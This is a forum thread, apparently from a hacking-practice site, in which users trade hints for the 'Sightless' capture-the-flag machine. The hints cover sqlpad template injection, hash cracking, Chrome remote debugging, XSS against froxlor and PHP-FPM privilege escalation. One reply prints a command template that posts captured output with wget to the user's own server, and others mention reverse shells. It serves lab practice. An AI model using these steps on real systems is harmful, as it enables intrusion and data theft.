Let’s talk about Sightless
. Please do not share any flags or writeups.
1. Initial Foothold
Examine the vulnerability at this link: Huntr Bounty 46630727
2. Docker Escape
Crack specific hashes to escape the Docker container.
3. Enumeration
Inspect local processes and port listenings and notice Chrome-Remote-Debugging
. By exploiting it, get admin
credentials for the froxlor
service.
4. Getting Root
Once you loggeed into the froxlor
dashboard, you can execute commands as root
by playing with PHP-FPM
settings.
These are general hints for the challenge. To not spoil the fun, I did not include exact commands or steps to solve the challenge. If you need more specific hints, feel free to ask.
- sqlpad template injection to rce to get access on docker
- Crack hash for user found in shadow file
- admin.sightless.htb running on 8080
- Portforward to access the vhost
- Intended (xss to get credentials)
- (Unintended) use metasploit chrome debugger to read /home/John/automation/administration.py for credentials
- (Again unintended) Portforward all the larger ports, chrome debugging and check the network, if session is preserved you’ll get the credentials
- For root; reset ftp creds, login and find database.kbd, crack the password and find ssh keys
- Or you can use php-fpm to read root.text or to get shell
This is more than enough.
@Hex feel free to remove if violates any rules
I’ve got the KeePass, and managed to open it. The entry in the backup isn’t working through… It isn’t a key; but it doesn’t work as a password.
Edit: nvm. I got it.
This they call an easy machine…
Will you rate it as an easy machine for the one having just basic knowledge of scanning using gobuster ffuf nmap
It is not Easy for a brand-new beginner.
And now the key doesn’t want to work… far out
Im try’in rce in database form but it was not successful, i took econnecrefused. Any hint?
I had a lot of trouble getting a shell from the form alone. Spin up a webserver that can accept POST requests; then you can
<CMD> > /path/to/file && wget --post-fie=/path/to/file http://<YOUR SERVER>
That will eventually give you enough info to get user.
how do you guys discover the port for initial access - basic mysql port gets refused
you mean to get reverse shell?
yes, i’ve changed the command in the database form field to a rev shell with bin/bash but always get connection refused in the new connection tab
You are just providing detailed hints, so it’s not a problem unless you are sharing flags.
I am not sure if XSS for credentials is an intended path, because they literally created Chrome remote debuggers, which is not the default. You might be getting credentials via XSS because people who obtain credentials via Chrome debuggers trigger the XSS, leading to valid cookies.
Someone who has a private instance could verify this.
Actually you can use this:Blind XSS Leading to Froxlor Application Compromise · Advisory · froxlor/Froxlor · GitHub
With xss you can’t get the creds but you can create a new user.
It might be. Maybe these Chrome instances are for simulating XSS. Connecting to a remote Chrome instance was a unique experience tough.
new user registration is possible, I’ve tested it.
Hey how did you all got admin page in sightless , I tried gobuster subdomains vhost ffuf but couldn’t get any hits…
I have the same question
if you are confused about server and port, just start a listener or server locally and provide that address.